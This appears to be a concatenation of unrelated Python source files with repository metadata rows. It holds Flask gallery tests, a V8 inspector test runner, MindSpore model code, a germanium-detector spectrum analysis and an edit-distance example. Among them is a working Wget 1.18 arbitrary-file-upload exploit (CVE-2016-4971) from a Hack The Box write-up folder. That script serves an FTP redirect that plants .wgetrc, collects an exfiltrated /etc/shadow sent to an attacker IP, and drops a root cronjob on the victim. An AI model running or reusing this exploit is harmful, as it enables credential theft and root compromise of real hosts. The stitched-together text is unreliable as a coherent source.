def test_post_exists_no_comments(self, client, mocker):
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, json=self.post)
mock.get('/api/posts/1/comments', json={'data':[]})
response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
def test_post_exists_comments(self, client, mocker):
self.post = self.test_data['post_comments_exist']
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, json=self.post)
mock.get('/api/posts/1/comments', json=self.comments)
response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
def test_add_post_not_authenticated(client):
test_post = {'tags': ['old_benwa', 'benwa'], 'submit': True}
assert not current_user.is_authenticated
response = client.get('/gallery/add', follow_redirects=False)
assert 'authorize' in response.headers['Location']
response = client.post('/gallery/add', data=test_post, follow_redirects=False)
assert 'authorize' in response.headers['Location']
def test_add_post_not_valid_submit(client, mocker):
test_post = {
'tags': ['old_benwa', 'benwa'],
'filename': 'bartwa.jpg',
'submit': True
}
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data',
data=test_post, follow_redirects=False)
assert response.status_code == 200
def test_add_post(client, mocker):
test_post = {
'tags': ['old_benwa', 'benwa'],
'filename': 'bartwa.jpg',
'image': (BytesIO(b'my file contents'), 'bartwa.jpg'),
'submit': True
}
mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'make_thumbnail')
mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'save_image')
user = utils.test_user().dump()
preview = entities.Preview(id=1)
image = entities.Image(id=1)
benwa_tag = entities.Tag(id=1, name='benwa')
tag = entities.Tag(id=2, name='old_benwa')
post = entities.Post(id=1, image=image, preview=preview, user=user, tags=[tag, benwa_tag])
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
mock.post('/api/previews', json=preview.dump())
mock.post('/api/images', json=image.dump())
mock.post('/api/posts', json=post.dump())
mock.get('/api/posts/1', json=post.dump())
mock.get('/api/tags', json={'data':[]})
mock.post('/api/tags', json=tag.dump())
response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data',
data=test_post, follow_redirects=False)
assert response.status_code == 302
assert 'gallery/show' in response.headers['Location']
@pytest.mark.skip
def test_add_comment(client, mocker):
form = {'content': 'its valid man','submit': True}
with client.session_transaction() as sess:
sess['access_token'] = 'Bearer ' + 'access token'
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
mock.post(current_app.config['API_URL'] + '/comments')
response = client.post(url_for('gallery.add_comment', post_id=1), data=form)
@pytest.mark.skip
def test_delete_comment(client, mocker):
login(client, mocker)
assert current_user.is_authenticated
| 38.581731 | 110 | 0.669408 |
6995669a1592ee824cf447cadab2957ceab6665b
| 3,933 |
py
|
Python
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
sita1999/arangodb
|
6a4f462fa209010cd064f99e63d85ce1d432c500
|
[
"Apache-2.0"
] | 22 |
2016-07-28T03:25:31.000Z
|
2022-02-19T02:51:14.000Z
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
lipper/arangodb
|
66ea1fd4946668192e3f0d1060f0844f324ad7b8
|
[
"Apache-2.0"
] | 10 |
2016-09-30T14:57:49.000Z
|
2017-06-30T12:56:01.000Z
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
lipper/arangodb
|
66ea1fd4946668192e3f0d1060f0844f324ad7b8
|
[
"Apache-2.0"
] | 23 |
2016-08-03T17:43:32.000Z
|
2021-03-04T17:09:00.000Z
|
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import os
import re
from testrunner.local import testsuite
from testrunner.local import utils
from testrunner.objects import testcase
FLAGS_PATTERN = re.compile(r"//\s+Flags:(.*)")
PROTOCOL_TEST_JS = "protocol-test.js"
EXPECTED_SUFFIX = "-expected.txt"
class InspectorProtocolTestSuite(testsuite.TestSuite):
def __init__(self, name, root):
super(InspectorProtocolTestSuite, self).__init__(name, root)
def ListTests(self, context):
tests = []
for dirname, dirs, files in os.walk(os.path.join(self.root), followlinks=True):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
files.sort()
for filename in files:
if filename.endswith(".js") and filename != PROTOCOL_TEST_JS:
fullpath = os.path.join(dirname, filename)
relpath = fullpath[len(self.root) + 1 : -3]
testname = relpath.replace(os.path.sep, "/")
test = testcase.TestCase(self, testname)
tests.append(test)
return tests
def GetFlagsForTestCase(self, testcase, context):
source = self.GetSourceForTest(testcase)
flags_match = re.findall(FLAGS_PATTERN, source)
flags = []
for match in flags_match:
flags += match.strip().split()
testname = testcase.path.split(os.path.sep)[-1]
testfilename = os.path.join(self.root, testcase.path + self.suffix())
protocoltestfilename = os.path.join(self.root, PROTOCOL_TEST_JS)
return [ protocoltestfilename, testfilename ] + flags
def GetSourceForTest(self, testcase):
filename = os.path.join(self.root, testcase.path + self.suffix())
with open(filename) as f:
return f.read()
def shell(self):
return "inspector-test"
def _IgnoreLine(self, string):
"""Ignore empty lines, valgrind output and Android output."""
if not string: return True
return (string.startswith("==") or string.startswith("**") or
string.startswith("ANDROID") or
# FIXME(machenbach): The test driver shouldn't try to use slow
# asserts if they weren't compiled. This fails in optdebug=2.
string == "Warning: unknown flag --enable-slow-asserts." or
string == "Try --help for options")
def IsFailureOutput(self, testcase):
file_name = os.path.join(self.root, testcase.path) + EXPECTED_SUFFIX
with file(file_name, "r") as expected:
expected_lines = expected.readlines()
def ExpIterator():
for line in expected_lines:
if line.startswith("#") or not line.strip(): continue
yield line.strip()
def ActIterator(lines):
for line in lines:
if self._IgnoreLine(line.strip()): continue
yield line.strip()
def ActBlockIterator():
"""Iterates over blocks of actual output lines."""
lines = testcase.output.stdout.splitlines()
start_index = 0
found_eqeq = False
for index, line in enumerate(lines):
# If a stress test separator is found:
if line.startswith("=="):
# Iterate over all lines before a separator except the first.
if not found_eqeq:
found_eqeq = True
else:
yield ActIterator(lines[start_index:index])
# The next block of output lines starts after the separator.
start_index = index + 1
# Iterate over complete output if no separator was found.
if not found_eqeq:
yield ActIterator(lines)
for act_iterator in ActBlockIterator():
for (expected, actual) in itertools.izip_longest(
ExpIterator(), act_iterator, fillvalue=''):
if expected != actual:
return True
return False
def GetSuite(name, root):
return InspectorProtocolTestSuite(name, root)
| 35.754545 | 83 | 0.663361 |
38e5142a0e015295b897f705f5b522fd98fa964d
| 2,834 |
py
|
Python
|
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 21 |
2016-02-06T14:30:01.000Z
|
2020-09-11T05:39:17.000Z
|
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | null | null | null |
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 7 |
2017-02-02T16:27:02.000Z
|
2021-04-30T17:14:53.000Z
|
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/shell.php'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '10.10.14.16'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.14.16'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
| 32.953488 | 145 | 0.661609 |
2a515b34a6909c06088f009b9969149b78a78fbb
| 5,013 |
py
|
Python
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define the network structure of DeepBSDE"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore import nn
from mindspore import ops as P
from mindspore import Tensor, Parameter
class DeepBSDE(nn.Cell):
"""
The network structure of DeepBSDE.
Args:
cfg: configure settings.
bsde(Cell): equation function
"""
def __init__(self, cfg, bsde):
super(DeepBSDE, self).__init__()
self.bsde = bsde
self.delta_t = bsde.delta_t
self.num_time_interval = bsde.num_time_interval
self.dim = bsde.dim
self.time_stamp = Tensor(np.arange(0, cfg.num_time_interval) * bsde.delta_t)
self.y_init = Parameter(np.random.uniform(low=cfg.y_init_range[0],
high=cfg.y_init_range[1],
size=[1]).astype(np.float32))
self.z_init = Parameter(np.random.uniform(low=-0.1, high=0.1, size=[1, cfg.dim]).astype(np.float32))
self.subnet = nn.CellList([FeedForwardSubNet(cfg.dim, cfg.num_hiddens)
for _ in range(bsde.num_time_interval-1)])
self.generator = bsde.generator
self.matmul = P.MatMul()
self.sum = P.ReduceSum(keep_dims=True)
def construct(self, dw, x):
"""repeat FeedForwardSubNet (num_time_interval - 1) times."""
all_one_vec = P.Ones()((P.shape(dw)[0], 1), mstype.float32)
y = all_one_vec * self.y_init
z = self.matmul(all_one_vec, self.z_init)
for t in range(0, self.num_time_interval - 1):
y = y - self.delta_t * (self.generator(self.time_stamp[t], x[:, :, t], y, z)) + self.sum(z * dw[:, :, t], 1)
z = self.subnet[t](x[:, :, t + 1]) / self.dim
# terminal time
y = y - self.delta_t * self.generator(self.time_stamp[-1], x[:, :, -2], y, z) + self.sum(z * dw[:, :, -1], 1)
return y
class FeedForwardSubNet(nn.Cell):
"""
Subnet to fit the spatial gradients at time t=tn
Args:
dim (int): dimension of the final output
train (bool): True for train
num_hidden list(int): number of hidden layers
"""
def __init__(self, dim, num_hiddens):
super(FeedForwardSubNet, self).__init__()
self.dim = dim
self.num_hiddens = num_hiddens
bn_layers = [nn.BatchNorm1d(c, momentum=0.99, eps=1e-6, beta_init='normal', gamma_init='uniform')
for c in [dim] + num_hiddens + [dim]]
self.bns = nn.CellList(bn_layers)
dense_layers = [nn.Dense(dim, num_hiddens[0], has_bias=False, activation=None)]
dense_layers = dense_layers + [nn.Dense(num_hiddens[i], num_hiddens[i + 1], has_bias=False, activation=None)
for i in range(len(num_hiddens) - 1)]
# final output should be gradient of size dim
dense_layers.append(nn.Dense(num_hiddens[-1], dim, activation=None))
self.denses = nn.CellList(dense_layers)
self.relu = nn.ReLU()
def construct(self, x):
"""structure: bn -> (dense -> bn -> relu) * len(num_hiddens) -> dense -> bn"""
x = self.bns[0](x)
hiddens_length = len(self.num_hiddens)
for i in range(hiddens_length):
x = self.denses[i](x)
x = self.bns[i+1](x)
x = self.relu(x)
x = self.denses[hiddens_length](x)
x = self.bns[hiddens_length + 1](x)
return x
class WithLossCell(nn.Cell):
"""Loss function for DeepBSDE"""
def __init__(self, net):
super(WithLossCell, self).__init__()
self.net = net
self.terminal_condition = net.bsde.terminal_condition
self.total_time = net.bsde.total_time
self.sum = P.ReduceSum()
self.delta_clip = 50.0
self.selete = P.Select()
def construct(self, dw, x):
y_terminal = self.net(dw, x)
delta = y_terminal - self.terminal_condition(self.total_time, x[:, :, -1])
# use linear approximation outside the clipped range
abs_delta = P.Abs()(delta)
loss = self.sum(self.selete(abs_delta < self.delta_clip,
P.Square()(delta),
2 * self.delta_clip * abs_delta - self.delta_clip * self.delta_clip))
return loss
| 41.775 | 120 | 0.596649 |
2aadb54c111d2e210d227f1fd406003b8af9a9a2
| 2,174 |
py
|
Python
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
##############export checkpoint file into air, mindir models#################
python export.py
"""
import os
import numpy as np
import mindspore as ms
from mindspore import Tensor, export, context
from src.utils import init_net
from model_utils.config import config
from model_utils.device_adapter import get_device_id
from model_utils.moxing_adapter import moxing_wrapper
context.set_context(mode=context.GRAPH_MODE, device_target=config.device_target)
if config.device_target == "Ascend":
context.set_context(device_id=get_device_id())
MAX_HR_SIZE = 2040
@moxing_wrapper()
def run_export():
"""
run export
"""
print(config)
cfg = config
if cfg.pre_trained is None:
raise RuntimeError('config.pre_trained is None.')
net = init_net(cfg)
max_lr_size = MAX_HR_SIZE // cfg.scale
input_arr = Tensor(np.ones([1, cfg.n_colors, max_lr_size, max_lr_size]), ms.float32)
file_name = os.path.splitext(os.path.basename(cfg.pre_trained))[0]
file_name = file_name + f"_InputSize{max_lr_size}"
file_path = os.path.join(cfg.output_path, file_name)
file_format = 'MINDIR'
num_params = sum([param.size for param in net.parameters_dict().values()])
export(net, input_arr, file_name=file_path, file_format=file_format)
print(f"export success", flush=True)
print(f"{cfg.pre_trained} -> {file_path}.{file_format.lower()}, net parameters = {num_params/1000000:>0.4}M",
flush=True)
if __name__ == '__main__':
run_export()
| 33.446154 | 113 | 0.702852 |
934c122981015f026c29b97624efde2c5f90f58d
| 4,140 |
py
|
Python
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""verify by svm"""
import time
import argparse
import numpy as np
from mindspore import context
from sklearn import svm
from sklearn.preprocessing import StandardScaler
def verify_cifar10():
"""
verify on cifar10 dataset
"""
label_path_train = "./preprocess_Result/cifar10_label_ids_train.npy"
label_path_test = "./preprocess_Result/cifar10_label_ids_test.npy"
label_set_train = np.load(label_path_train, allow_pickle=True)
label_set_test = np.load(label_path_test, allow_pickle=True)
result_set_train = []
for i in range(0, 500):
result_file_train = './result_Files_train/dcgan_data_bs100_' + str(i) + "_train_0.bin"
result = np.fromfile(result_file_train, dtype=np.float32).reshape(-1, 14336)
result_set_train.append(result)
result_set_train = np.array(result_set_train)
result_set_train = result_set_train.reshape(-1, 14336)
label_set_train = label_set_train.reshape(-1, 1)
label_set_train = label_set_train.flatten()
result_set_test = []
for i in range(0, 100):
result_file_test = './result_Files_test/dcgan_data_bs100_' + str(i) + "_test_0.bin"
result = np.fromfile(result_file_test, dtype=np.float32).reshape(-1, 14336)
result_set_test.append(result)
result_set_test = np.array(result_set_test)
result_set_test = result_set_test.reshape(-1, 14336)
label_set_test = label_set_test.reshape(-1, 1)
label_set_test = label_set_test.flatten()
print("result_set_train.shape: ", result_set_train.shape)
print("label_set_train.shape: ", label_set_train.shape)
print("result_set_test.shape: ", result_set_test.shape)
print("label_set_test.shape: ", label_set_test.shape)
print("============================standradScaler")
standardScaler = StandardScaler()
standardScaler.fit(result_set_train)
result_set_train_standard = standardScaler.transform(result_set_train)
standardScaler.fit(result_set_test)
result_set_test_standard = standardScaler.transform(result_set_test)
print("============================training")
clf = svm.SVC(max_iter=-1)
start = time.time()
print("result_set_train.shape: ", result_set_train_standard.shape)
print("label_set_train.shape: ", label_set_train.shape)
clf.fit(result_set_train_standard, label_set_train)
t = time.time() - start
print("train time:", t)
print("============================testing")
# Test on Training data
print("result_set_test.shape: ", result_set_test_standard.shape)
print("label_set_test.shape: ", label_set_test.shape)
test_result = clf.predict(result_set_test_standard)
accuracy = sum(test_result == label_set_test) / label_set_test.shape[0]
print('Test accuracy: ', accuracy)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='image production training')
parser.add_argument('--device_target', type=str, default='Ascend', choices=('Ascend', 'GPU'),
help='device where the code will be implemented (default: Ascend)')
parser.add_argument('--device_id', type=int, default=0, help='device id of GPU or Ascend. (Default: 0)')
args = parser.parse_args()
device_target = args.device_target
device_id = args.device_id
context.set_context(mode=context.GRAPH_MODE, device_target=device_target, save_graphs=False, device_id=device_id)
print("============================verify_cifar10")
verify_cifar10()
| 41.818182 | 117 | 0.7 |
935fec1ff1cb0ca01485e176912022487eea1a96
| 4,960 |
py
|
Python
|
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | 2 |
2019-03-07T08:55:36.000Z
|
2019-04-22T18:13:03.000Z
|
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | null | null | null |
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | 2 |
2017-10-27T13:26:43.000Z
|
2018-01-13T09:12:24.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import uncertainties
from scipy.signal import find_peaks
from scipy.optimize import curve_fit
import scipy.constants as sc
import scipy.integrate as integrate
from uncertainties import ufloat
from uncertainties import unumpy as unp
from uncertainties.unumpy import nominal_values as nomval
from uncertainties.unumpy import std_devs as std
# Loading experimental data and results of further calculations
r = 0.5*45*10**(-3)
L = (73.5+15)*10**(-3)
Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2))
C_u2 = np.genfromtxt('2018-12-10_Nitschke_Pape/Probe_21.Spe', unpack = True)
Peaks_Eu, Q_Eu = np.genfromtxt('EuropiumQ.txt', unpack = True)
Channels = np.linspace(0,len(C_u2[:4000])-1, len(C_u2[:4000]))
params_energy, covariance_energy_0, covariance_energy_1, params_Q, covariance_Q_0, covariance_Q_1= np.genfromtxt('Europium.txt', unpack = True)
covariance_energy = np.array([covariance_energy_0, covariance_energy_1])
errors_energy = np.sqrt(np.diag(covariance_energy))
covariance_Q = np.array([covariance_Q_0,covariance_Q_1])
errors_Q = np.sqrt(np.diag(covariance_Q))
def Energy(C):
return ufloat(params_energy[0], errors_energy[0])*C + ufloat(params_energy[1], errors_energy[1])
def Gauss(x, A, xmu, sigma, B):
return A * np.exp(-0.5*(x-xmu)**2/sigma**2) + B
def Gauss_Ufloat(x, A, xmu, sigma):
return A * unp.exp(-0.5*(x-xmu)**2/sigma**2)
def AreaGaus(A, sigma):
return np.sqrt(2*np.pi)*sigma*A
def Efficiency(E):
return ufloat(params_Q[0], errors_Q[0])*E**ufloat(params_Q[1], errors_Q[1])
Spektrum = C_u2[:4000]
tges = 4046
Peaks = find_peaks(Spektrum, height = 120)
plt.clf()
plt.hist(unp.nominal_values(Energy(np.arange(0, len(Spektrum[0:4000]), 1))),
bins=unp.nominal_values(Energy(np.linspace(0, len(Spektrum[0:4000]), len(Spektrum[0:4000])))),
weights=Spektrum[0:4000], label='Spektrum')
plt.yscale('log')
plt.plot(nomval(Energy(Peaks[0][:])), Spektrum[Peaks[0][:]], '.',
markersize=4, label='Gauß-Peaks', color='C1', alpha=0.8)
plt.xlim(0,1500)
plt.ylabel('Zählungen pro Energie')
plt.xlabel('E / keV')
plt.legend()
#plt.show()
plt.savefig('Plots/unbekannt2.pdf')
Peaks_Energy = Energy(Peaks[0][:])
Energy_co = np.array([1173.237, 1332.501])
Params_u2 = []
errors_u2 = []
for n in Peaks[0]:
Params, covariance = curve_fit(Gauss, Channels[n-30:n+30], Spektrum[n-30:n+30], p0 = [C_u2[n], n, 1, 0])
Params_u2.append(Params.tolist())
errors = np.sqrt(np.diag(covariance))
errors_u2.append(errors.tolist())
for i,n in enumerate(Peaks[0]):
l_u = np.int(Channels[n-30])
l_o = np.int(Channels[n+30])
plt.clf()
plt.hist(unp.nominal_values(Energy(np.arange(l_u, l_o, 1))),
bins=unp.nominal_values(Energy(np.linspace(l_u, l_o, len(Spektrum[n-30:n+30])))),
weights=Spektrum[n-30:n+30], label='Spektrum')
Channel_Gauss = np.linspace(n-30,n+30,1000)
plt.plot(unp.nominal_values(Energy(Channel_Gauss)), Gauss(Channel_Gauss,*Params_u2[i]))
#plt.show()
Peaks_mittel = np.round(np.asarray(Params_u2)[:,1],0)
Amplitudes = np.asarray(Params_u2)[:,0]
Amplitudes_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,0]) for i,n in enumerate(np.asarray(Params_u2)[:,0])])
Means_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,1]) for i,n in enumerate(np.asarray(Params_u2)[:,1])])
sigmas = np.asarray(Params_u2)[:,2]
sigmas_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,2]) for i,n in enumerate(np.asarray(Params_u2)[:,2])])
Area_Params = np.array([[n,sigmas[i]] for i,n in enumerate(Amplitudes)])
Area_params_ufloat = np.array([[n,sigmas_ufloat[i]] for i,n in enumerate(Amplitudes_ufloat)])
Constants_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,3]) for i,n in enumerate(np.asarray(Params_u2)[:,3])])
print("--- Find Peaks and gaussian fit---")
print(f"Channel Peaks: {np.round(Peaks_mittel,0)}")
#print(f"Energy Peaks: {Energy(np.round(Peaks_mittel,0))}")
print(f"Energy Literature: {Energy_co}", '\n')
Area = AreaGaus(Area_Params[:,0], Area_Params[:,1])
Area_ufloat = AreaGaus(Area_params_ufloat[:,0], Area_params_ufloat[:,1])
Area_norm = Area/tges
Area_norm_ufloat = Area_ufloat/tges
print("-- Fit Parameter --")
print(f"Amplituden: {Amplitudes_ufloat}")
print(f"Means: {Energy(Means_ufloat)}")
print(f"Sigmas: {sigmas_ufloat}")
print(f"Constants: {Constants_ufloat}", '\n')
print("--- Calculating the activity ---")
r = 0.5*45*10**(-3)
L = (73.5+15)*10**(-3)
Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2))
W = np.asarray([0.999736, 0.999856])
Q = Efficiency(Peaks_Energy)
Aktivität = np.array([Area_norm[i]/(W[i]*n*Omega) for i,n in enumerate(Q)])
print(f"emission probability: {W}")
print(f"Area under Gaussian Fit: {Area_ufloat}")
print(f"Efficiency: {Q}", '\n')
print(f"resulting acitivity: {Aktivität}")
A_all = sum(Aktivität)/len(Aktivität)#ufloat(np.mean(nomval(Aktivität)),np.std(std(Aktivität)))
print(f"Mean with all values: {nomval(A_all)}, {std(A_all)}")
| 38.75 | 143 | 0.703831 |
35813f5601c81a9ccc7791e5578db64b1a5ddd91
| 1,684 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
from ch07_recursion_advanced.intro.decorator_utils import decorate_with_memo_shorter
def edit_distance(str1, str2):
return __edit_distance_helper(str1.lower(), str2.lower(),
len(str1) - 1, len(str2) - 1)
@decorate_with_memo_shorter
def __edit_distance_helper(str1, str2, pos1, pos2):
# rekursiver Abbruch
# wenn einer der Strings am Anfang ist und der andere
# noch nicht, dann nimm die Länge des verbliebenen Strings
if pos1 <= 0:
return pos2
if pos2 <= 0:
return pos1
# Prüfe, ob die Zeichen übereinstimmen und dann auf zum nächsten
if str1[pos1] == str2[pos2]:
# rekursiver Abstieg
return __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1)
else:
# prüfe auf insert, delete, change
insert_in_first = __edit_distance_helper(str1, str2, pos1, pos2 - 1)
delete_in_first = __edit_distance_helper(str1, str2, pos1 - 1, pos2)
change = __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1)
# Minimum aus allen drei Varianten + 1
return 1 + min(insert_in_first, delete_in_first, change)
def main():
inputs_tuples = [("Micha", "Michael"),
("Ananas", "Banane"),
("sunday-Night-Mic", "saturday-Morning-Mi"),
("sunday-Night-Mike", "saturday-Morning-Micha")]
print("With memoization")
for inputs in inputs_tuples:
print(inputs[0], " -> ", inputs[1],
" edits: ", str(edit_distance(inputs[0], inputs[1])))
if __name__ == "__main__":
main()
| 31.773585 | 84 | 0.630641 |
35a7447d0590910a82fcc439dcd665a03532eabe
| 6,911 |
py
|
Python
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
